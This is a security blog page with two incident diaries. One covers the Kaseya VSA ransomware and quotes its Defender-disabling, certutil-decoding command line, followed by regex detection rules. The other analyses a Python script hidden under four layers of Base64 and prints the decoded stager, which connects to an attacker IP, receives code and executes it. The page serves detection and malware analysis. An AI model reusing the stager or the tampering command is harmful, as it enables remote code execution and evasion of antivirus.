SANS ISC: InfoSec Handlers Diary Blog

Kaseya VSA Users Hit by Ransomware

Published: 2021-07-02
Last Updated: 2021-07-02 20:18:29 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

We are aware that customers of some MSSPs (Managed Security Services Providers) have been hit by ransomware. It seems that four (4) MSSPs have been affected so far. The ransomware was spread through the remote management solution "VSA" provided by Kaseya[1]. This looks to be a brand new type of supply chain attack.

What do we know so far? Kaseya has asked all customers to shut down their on-premises VSA servers (the cloud version is already down) because, once a server is compromised, the attacker prevents access to the device.

The ransomware is dropped to c:\kworking\agent.exe[2].

If you're a Kaseya VSA user, please check as soon as possible with your representative to mitigate this attack. We will update this diary with more information when available.

[Update 1]

Some artifacts:

Suspicious directory: C:\kworking

AgentMon.exe
  -> cmd.exe /c ping 127.0.0.1 -n 6745 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
    -> powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
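The command line above contains several behaviours a detection engineer can key on independently of any file hash: Defender being switched off through Set-MpPreference, certutil.exe being copied and padded with a random value so the copy no longer matches a known hash, the renamed copy being used to decode the payload, a long ping to 127.0.0.1 used as a sleep, and the C:\kworking working directory. The script below is an added example, not code from the diary or from Kaseya: it runs a handful of pattern rules over constructed process-creation events (the first reproduces the diary's command line; the other two are benign look-alikes constructed here) and flags an event only when the rules corroborate each other, since the Kaseya agent legitimately spawns cmd.exe on its own.

```python
import re

# Constructed process-creation events (not telemetry from the incident).
# DIARY_CMDLINE is the command line published in the diary, split into
# adjacent raw strings only for readability.
DIARY_CMDLINE = (
    r"cmd.exe /c ping 127.0.0.1 -n 6745 > nul & "
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference "
    r"-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true "
    r"-DisableIOAVProtection $true -DisableScriptScanning $true "
    r"-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode "
    r"-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & "
    r"copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & "
    r"echo %RANDOM% >> C:\Windows\cert.exe & "
    r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & "
    r"del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe"
)

SAMPLE_EVENTS = [
    {"parent": "AgentMon.exe", "image": "cmd.exe", "cmdline": DIARY_CMDLINE},
    # Benign look-alike (constructed): the agent running a short ping.
    {"parent": "AgentMon.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c ping 127.0.0.1 -n 1 > nul"},
    # Benign look-alike (constructed): an admin reading Defender settings.
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe Get-MpPreference"},
]

# Each rule names one behaviour seen in the diary's command line.
RULES = [
    ("defender_tamper",
     re.compile(r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|IOAVProtection|"
                r"ScriptScanning|IntrusionPreventionSystem)", re.I)),
    # certutil.exe copied under another name
    ("certutil_copy", re.compile(r"\bcopy\s+/Y\s+\S*certutil\.exe\s+\S+", re.I)),
    # random bytes appended to an executable to change its hash
    ("certutil_hashbust", re.compile(r"echo\s+%RANDOM%\s*>>\s*\S+\.exe", re.I)),
    # certutil (or its renamed copy) used to decode a file
    ("certutil_decode", re.compile(r"\S*cert(?:util)?\.exe\s+-decode\b", re.I)),
    # ping to localhost with a three-digit (or larger) count, i.e. a sleep
    ("ping_sleep", re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+\d{3,}\b", re.I)),
    ("kworking_path", re.compile(r"\b[a-z]:\\kworking\\", re.I)),
]


def score_event(event):
    """Return the names of every rule that matches this event's command line."""
    hits = [name for name, rx in RULES if rx.search(event["cmdline"])]
    # Parent/child relationship is a separate signal: the VSA agent
    # (AgentMon.exe) spawning a shell.
    if (event["parent"].lower() == "agentmon.exe"
            and event["image"].lower() in ("cmd.exe", "powershell.exe")):
        hits.append("agentmon_spawns_shell")
    return hits


def is_suspicious(event):
    """Tampering with Defender is enough on its own; otherwise require
    two corroborating signals, so a lone agent-spawned ping is not an alert."""
    hits = score_event(event)
    return "defender_tamper" in hits or len(hits) >= 2


def triage(events):
    """Return (index, hits) for every event that should raise an alert."""
    return [(i, score_event(e)) for i, e in enumerate(events) if is_suspicious(e)]


if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(f"event {index}: ALERT {hits}")
```

The rules deliberately match the renamed copy (cert.exe) as well as certutil.exe itself, because the copy-and-rename step exists precisely to dodge image-name matching; in a real pipeline the same regexes apply to the command-line field of Sysmon event ID 1 or Windows Security event 4688 with command-line auditing enabled.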

[1] https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689
[2] https://www.virustotal.com/gui/file/d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key


"inception.py"... Multiple Base64 Encodings

Published: 2021-07-02
Last Updated: 2021-07-02 05:33:23 UTC
by Xavier Mertens (Version: 1)
4 comment(s)

"Inception" is a very nice sci-fi movie in which, if you have not watched it, dreams are implanted in people's minds to gain access to sensitive information stored in their memory. Then a dream is implanted inside another dream, and so on, up to five levels[1]! If you are not paying attention to the movie, you can quickly get lost.

Yesterday, I spotted an interesting malicious Python script. It has a very low VT score (3/58)[2] and is very small:

import base64;exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoYnl0ZXMoJ2FXMXdiM0owSUdKaGMy
VTJORHRsZUdWaktHSmhjMlUyTkM1aU5qUmtaV052WkdVb1lubDBaWE1vSjFwWWFHeFplV2htV0RKc2RHTkhPWGxrUmpsbVMwTmthVmxZVG14T2Fs
RnVTMU0xYVU1cVVtdGFWMDUyV2tkVmIxZ3hPWEJpV0VKMlkyNVNabGg1WjI1Wk1qbHJXbGRPZWtwNWEzVmFNbFl3V2xjMWFtSXlVbXhqYVdkdVpG
aFNiVXhVWjI1TFUyZHVXVlpqZUdReVNYcFRha0pLVTBVMU1sZFVTakJpUjFKRVpVUmFhVkl5ZUhCVVJXUkxZVWROZVZaVVNrOVJNMmcyV2tWb1Mw
MVdhM3BWV0U1clVqSjRNRmRzUm5kaVYwbDZVMWRrYkZFd1NuZFpiV3hEWlZac1dFNVhOV0ZWTW1RMFZGVk9jazVyVG01aVJFSnFZbTF6TWxFeVpI
SlRiVTQyVFZod2FVMXJOWGxYYkdoU1pGZE5lVTlYY0doTmJGbDNVekJTU21NeVRYbFBWM0JvVFd4WmQxUkhlRTlWUmtWM1pFZGFWazFXU2xSVmJG
WkhWR3QwVW1Jd2NFUlhSVEV4VjFSSk5XUlhTblJXYlhCclVUSmtkbE51Y0ZabFZYaHhVbFJDVFdGclZUQlVSM0JHWlZVNVZGa3pUazVXUlZWNFZH
NXdhbU5GZEZKaU1IQkVWakJ3TlZkc1pFZGphMDV1WWtkNGJGSXdOWE5aTUdoU1RtdE9ibUV3Y0d0U01uZ3dWMnhOTVdWdFNraFdiWGhxVVRKamVG
TXhSbmRqTVVKWlZHcENhbUpzV25GYVJVMHhUVmRLZFZGdGFGcE5iazUyVTI1dk1WTnJjRFZsU0hCTlltdHdjMWRVVGxwaU1EVkVZVE5DV0dWclNt
dFJNakZTVDFkT05VNVliR0ZXTURSNVV6QmtNMk5GVG5WYVJ6bG9Wak5vYzFOVlpEUmlSMHB3WVVkMFRGWklhSHBVTW1SMlUyeHdSR042YkdwbFZG
WTFWMnhrVDAxcmRFaGtNMUpwVWpGYU1WTXdaRkpqUlhSU1kwZDRiRkl4V25GVE1HaDNZekpHV0ZOWVZtRlNNVnB4V1dwSmVHUXlUblJXYm5CcVpW
ZG9jRmRXYUU5aVJUVnhWVmhXV21Gc2EzZFhhMlJYWVcxSmVWVnRlRXhTTVVaM1V6Rk9ORTR3YjNwVVZ6VlFZbXMwTlZNeFJuWlFVMk53VjNwQ1pF
dFRhejBuTENkVlZFWXRPQ2NwS1M1a1pXTnZaR1VvS1NrPScsJ1VURi04JykpLmRlY29kZSgpKQ==','UTF-8')).decode())

When you see this, your reflex is to decode the Base64-encoded data. It's probably a simple script; let's have a look at it:

remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py
ID  Size    Encoded          Decoded          md5 decoded                     
--  ----    -------          -------          -----------                     
 1:       4 exec             {..              dfaf38dfe495302d62c3a9cefd4dc593
 2:    1384 aW1wb3J0IGJhc2U2 import base64;ex 953edd11c0c0f82534e750ebb8e4dad3
remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py -s 2 -d
import base64;exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoYnl0ZXMoJ1pYaGxZeWhmWDJsdGNH
OXlkRjlmS0NkaVlYTmxOalFuS1M1aU5qUmtaV052WkdVb1gxOXBiWEJ2Y25SZlh5Z25ZMjlrWldOekp5a3VaMlYwWlc1amIyUmxjaWduZFhSbUxU
Z25LU2duWVZjeGQySXpTakJKU0U1MldUSjBiR1JEZURaaVIyeHBURWRLYUdNeVZUSk9RM2g2WkVoS01Wa3pVWE5rUjJ4MFdsRndiV0l6U1dkbFEw
SndZbWxDZVZsWE5XNWFVMmQ0VFVOck5rTm5iREJqYm1zMlEyZHJTbU42TVhwaU1rNXlXbGhSZFdNeU9XcGhNbFl3UzBSSmMyTXlPV3BoTWxZd1RH
eE9VRkV3ZEdaVk1WSlRVbFZHVGt0UmIwcERXRTExV1RJNWRXSnRWbXBrUTJkdlNucFZlVXhxUlRCTWFrVTBUR3BGZVU5VFkzTk5WRVV4VG5wamNF
dFJiMHBEVjBwNVdsZEdja05uYkd4bFIwNXNZMGhSTmtObmEwcGtSMngwV2xNMWVtSkhWbXhqUTJjeFMxRndjMUJZVGpCamJsWnFaRU0xTVdKdVFt
aFpNbk52U25vMVNrcDVlSHBNYmtwc1dUTlpiMDVEYTNCWGVrSmtRMjFST1dONU5YbGFWMDR5UzBkM2NFTnVaRzloVjNoc1NVZDRiR0pwYUd0TFZI
aHpUMmR2U2xwRGN6bGplVFY1V2xkT01rdEhkM1JpUjFaMVMwZFJjRXRSY0d4bFIxWnFTMGh3YzJGWFNYVmFSMVpxWWpJeGQyTnRWbnBqZVdocFdW
aE9iRTVxVVhWWmFsa3dXa2RXYW1JeVVteExSMUZ3UzFONE4wb3pUVzVQYms0NVMxRnZQU2NwV3pCZEtTaz0nLCdVVEYtOCcpKS5kZWNvZGUoKSk=
','UTF-8')).decode())

Another chunk of Base64 data? Let's do it again. In the end, the payload turned out to be encoded four times! (Thanks to base64dump.py for working smoothly with pipes!)

remnux@remnux:/MalwareZoo/20210702$ base64dump.py inception.py -s 2 -d | \
base64dump.py -s 2 -d | \
base64dump.py -s 2 -d | \
base64dump.py -s 2 -d
import socket,zlib,base64,struct,time
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect(('52[.]14[.]18[.]129',11577))
        break
    except:
        time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})

Basically, what we have is this:

remnux@remnux:/MalwareZoo/20210702$ echo "Hello" | base64 | base64 | base64 | base64 -d | base64 -d | base64 -d
Hello
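Rather than piping through base64dump.py once per layer by hand, a small static unwrapper can peel the layers without ever executing the script. The one below is an added example (not the diary's code and not part of base64dump.py): it recognizes the exec(base64.b64decode(...)) wrapper the sample uses, tolerates the line-wrapped blobs seen in the listings above, and stops when the decoded text has no further Base64 literal to open (as happens at the socket stager) or when the literal is not valid Base64. The nested sample it runs on is constructed here, with a harmless print() as the innermost payload, in the same shape as inception.py.

```python
import base64
import re

# A quoted run of Base64 alphabet characters, at least 40 long. Whitespace is
# allowed inside because long blobs are often wrapped across lines.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/=\s]{40,})['"]""")


def wrap_once(code: str) -> str:
    """Build one layer in the same shape as the diary's sample (constructed here)."""
    blob = base64.b64encode(code.encode("utf-8")).decode("ascii")
    return ("import base64;exec(base64.b64decode(bytes('"
            + blob + "','UTF-8')).decode())")


def wrap(code: str, layers: int) -> str:
    """Nest the payload `layers` times, like the four levels of inception.py."""
    for _ in range(layers):
        code = wrap_once(code)
    return code


def unwrap(script: str, max_layers: int = 16) -> list:
    """Statically peel exec(base64 ...) layers. Returns every layer, outermost
    first; the last element is the payload that would finally be executed.
    Nothing is ever evaluated, and max_layers bounds the work on hostile input."""
    layers = [script]
    current = script
    for _ in range(max_layers):
        if "exec(" not in current:          # no evaluation wrapper left to open
            break
        match = B64_LITERAL.search(current)
        if match is None:                   # e.g. the final socket stager
            break
        blob = re.sub(r"\s+", "", match.group(1))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            break
        layers.append(decoded)
        current = decoded
    return layers


def summarize(script: str) -> dict:
    """Depth of nesting plus two coarse indicators about the final payload."""
    layers = unwrap(script)
    final = layers[-1]
    return {
        "depth": len(layers) - 1,
        "final_payload": final,
        "opens_socket": "socket" in final,
        "evaluates_remote_code": "exec(" in final,
    }


# Constructed benign sample, nested four times like inception.py.
INNER = 'print("hello from the innermost layer")'
SAMPLE = wrap(INNER, 4)

if __name__ == "__main__":
    for i, layer in enumerate(unwrap(SAMPLE)):
        print(f"layer {i}: {layer[:60]}{'...' if len(layer) > 60 else ''}")
    print(summarize(SAMPLE))
```

On the real sample the last layer would be the socket stager shown above, where summarize() reports both opens_socket and evaluates_remote_code, which is the point at which static peeling ends and the indicators (the IP and port) are what you extract.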

The decoded script is a slightly modified Meterpreter backdoor and the IP address is alive. I connected to it in a sandbox and expected to get some payload but nothing...

A simple technique, but it remains very effective at bypassing antivirus solutions!

[1] https://visual.ly/community/Infographics/entertainment/5-levels-inception
[2] https://www.virustotal.com/gui/file/5bbde2e0191fac97ecceb6daf05780ae794966cfa0eeeeeda57541e33205a133/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
